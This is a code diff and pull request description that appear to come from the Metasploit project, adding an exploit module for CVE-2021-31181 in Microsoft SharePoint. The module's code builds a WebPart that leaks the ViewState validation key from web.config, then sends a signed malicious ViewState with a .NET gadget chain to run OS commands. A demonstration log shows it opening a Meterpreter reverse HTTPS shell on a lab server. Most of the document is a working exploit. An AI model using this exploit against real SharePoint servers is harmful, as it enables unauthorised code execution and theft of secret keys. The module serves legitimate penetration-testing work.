     print_good("ViewState validation key: #{@validation_key}")

--- a/modules/exploits/windows/http/sharepoint_unsafe_control.rb
+++ b/modules/exploits/windows/http/sharepoint_unsafe_control.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::ViewState
+  include Msf::Exploit::Remote::HTTP::Sharepoint
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
 
@@ -20,23 +20,29 @@ class MetasploitModule < Msf::Exploit::Remote
     'xsd' => 'http://www.w3.org/2001/XMLSchema'
   }.freeze
 
-  # TODO: write all the module meta data
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Microsoft SharePoint ...',
         'Description' => %q{
+          The EditingPageParser.VerifyControlOnSafeList method has fails to properly validate user supplied data. This
+          can be leveraged by an attacker to leak sensitive information in rendered-preview content. This module will
+          leak the ViewState validation key and then use it to sign a crafted object that will trigger code execution
+          when deserialized.
+
           Tested against SharePoint 2019 on Windows Server 2016.
         },
         'Author' => [
+          'Unknown', # Reported to HP ZDI team, Vulnerability discovery
           'Spencer McIntyre', # Module
           'wvu' # Module
         ],
         'References' => [
-
+          [ 'CVE', '2021-31181' ],
+          [ 'URL', 'https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability' ]
         ],
-        'DisclosureDate' => '', # Public disclosure
+        'DisclosureDate' => '2021-06-02', # Public disclosure via the ZDI blog (see the references)
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
@@ -90,6 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'Base path', '/']),
       OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
       OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),
+      OptString.new('SP_LIST', [true, 'SharePoint site SPList', 'Documents']),
       # "Promote" these advanced options so we don't have to pass around our own
       OptString.new('HttpUsername', [false, 'SharePoint username']),
       OptString.new('HttpPassword', [false, 'SharePoint password'])
@@ -113,38 +120,24 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def vuln_builds
-    # TODO: update these build numbers
+    # TODO: update the starting / lower build numbers
     # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
     # https://buildnumbers.wordpress.com/sharepoint/
     [
-      [Rex::Version.new('15.0.0.4571'), Rex::Version.new('15.0.0.5275')], # SharePoint 2013
-      [Rex::Version.new('16.0.0.4351'), Rex::Version.new('16.0.0.5056')], # SharePoint 2016
-      [Rex::Version.new('16.0.0.10337'), Rex::Version.new('16.0.0.10366')] # SharePoint 2019
+      [Rex::Version.new('15.0.0.0'), Rex::Version.new('15.0.0.5337')], # SharePoint 2013
+      [Rex::Version.new('16.0.0.0'), Rex::Version.new('16.0.0.5149')], # SharePoint 2016
+      [Rex::Version.new('16.0.0.10000'), Rex::Version.new('16.0.0.10373')] # SharePoint 2019
     ]
   end
 
   def check
-    # TODO: write this check method
-    return CheckCode::Vulnerable('hack the planet')
+    build = sharepoint_get_version('cookie' => cookie)
 
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path),
-      'cookie' => cookie
-    )
-
-    unless res
-      return CheckCode::Unknown('Target did not respond to check.')
+    if build.nil?
+      return CheckCode::Unknown('Failed to retrieve the SharePoint version number')
     end
 
-    # Hat tip @tsellers-r7
-    #
-    # MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
-    unless /^(?<build>[\d.]+):/ =~ res.headers['MicrosoftSharePointTeamServices']
-      return CheckCode::Unknown('Target does not appear to be running SharePoint.')
-    end
-
-    if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
+    if vuln_builds.any? { |build_range| build.between?(*build_range) }
       return CheckCode::Appears("SharePoint #{build} is a vulnerable build.")
     end
 
@@ -181,29 +174,28 @@ class MetasploitModule < Msf::Exploit::Remote
   def leak_web_config
     print_status('Leaking the ViewState validation key...')
 
-    # TODO: make these dynamic
-    sp_list = 'Documents'
-    web_id = 'f52d2033-c11f-4aa5-af7d-5d5284a2cbad'
+    web_id = sharepoint_get_site_web_id('cookie' => cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the site web ID') unless web_id
 
     webpart = <<~WEBPART
-      <%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>#{' '}
+      <%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
       <%@ Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%>
     WEBPART
     webpart << Nokogiri::XML(<<-WEBPART, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
-      <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="#{sp_list.encode(xml: :text)}" WebId="{#{web_id.encode(xml: :text)}}">#{' '}
-        <DataSources>#{' '}
-          <att:xmldatasource runat="server" id="XDS1"#{' '}
-            XPath="/configuration/system.web/machineKey"#{' '}
-            datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />#{' '}
-        </DataSources>#{' '}
-        <xsl>#{' '}
-            <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">#{'          '}
-                <xsl:output method="xml" indent="yes"/>#{' '}
-                <xsl:template match="/" >#{' '}
-                <xsl:copy-of select="."/>#{' '}
-                </xsl:template>#{' '}
-            </xsl:stylesheet>#{' '}
-        </xsl>#{' '}
+      <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="#{datastore['SP_LIST'].encode(xml: :text)}" WebId="{#{web_id.encode(xml: :text)}}">
+        <DataSources>
+          <att:xmldatasource runat="server" id="XDS1"
+            XPath="/configuration/system.web/machineKey"
+            datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />
+        </DataSources>
+        <xsl>
+            <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                <xsl:output method="xml" indent="yes"/>
+                <xsl:template match="/" >
+                    <xsl:copy-of select="."/>
+                </xsl:template>
+            </xsl:stylesheet>
+        </xsl>
       </WebPartPages:XsltListFormWebPart>
     WEBPART
 
@@ -246,30 +238,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    vprint_status("Executing command: #{cmd}")
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
-      'cookie' => cookie,
-      'vars_post' => {
-        '__VIEWSTATE' => generate_viewstate_payload(
-          cmd,
-          extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
-          algo: 'sha256',
-          key: pack_viewstate_validation_key(@validation_key)
-        )
-      }
-    )
-
-    unless res
-      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
-    end
-
-    unless res.code == 200
-      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
-    end
-
-    vprint_good('Successfully executed command')
+    sharepoint_execute_command_via_viewstate(cmd, @validation_key, { 'cookie' => cookie })
   end
 end


### PR DESCRIPTION
This adds an exploit for CVE-2021-31181 which is an authenticated RCE within SharePoint. The vulnerability is a discrepancy in how a control is validated allowing it to be bypassed and an unsafe control used. As outlined in the [original ZDI disclosure](https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability), this module uses the `System.Web.UI.WebControls.XmlDataSource` control to leak the ViewState validation key. After that, a malicious ViewState is issued with a serialized .NET gadget chain that will execute an OS command.

Other than the means by which the ViewState validation key is obtained, this module is very similar to the `sharepoint_ssi_viewstate` module. This also adds a brand new SharePoint mixin which some functionality to execute code via a malicious ViewState and perform some basic enumeration functions.

The user needs to have the `SPBasePermissions.ManageLists` permission on the targeted site, but by default users can make their own site where that permission will be present. This action isn't taken by the module, and must be done manually by the user. This is all included in the module docs for the `HttpUsername` option.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/http/sharepoint_unsafe_control`
- [x] Set the `RHOST`, `HttpUsername` and `HttpPassword` options as necessary
- [x] Set the `PAYLOAD` and related options
- [x] Run `exploit` and get a shell

## Demonstration

```
msf6 exploit(windows/http/sharepoint_unsafe_control) > set RHOSTS 192.168.159.46
RHOSTS => 192.168.159.46
msf6 exploit(windows/http/sharepoint_unsafe_control) > set VHOST shrpnt2019
VHOST => shrpnt2019
msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpUsername aliddle
HttpUsername => aliddle
msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpPassword Password1
HttpPassword => Password1
msf6 exploit(windows/http/sharepoint_unsafe_control) > check
[*] 192.168.159.46:80 - The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
msf6 exploit(windows/http/sharepoint_unsafe_control) > exploit

[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
[*] Leaking the ViewState validation key...
[+] ViewState validation key: F894731BF335C2DAB04D70773B5F6BE55EE2C4052B671EE3C6785497A3D29A94
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] https://192.168.159.128:8443 handling request from 192.168.159.46; (UUID: a5re3jes) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 127.0.0.1) at 2021-06-08 15:08:59 -0400

meterpreter > getuid
Server username: SHRPNT\SharePoint
meterpreter > sysinfo
Computer        : SHRPNT2019
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > 
```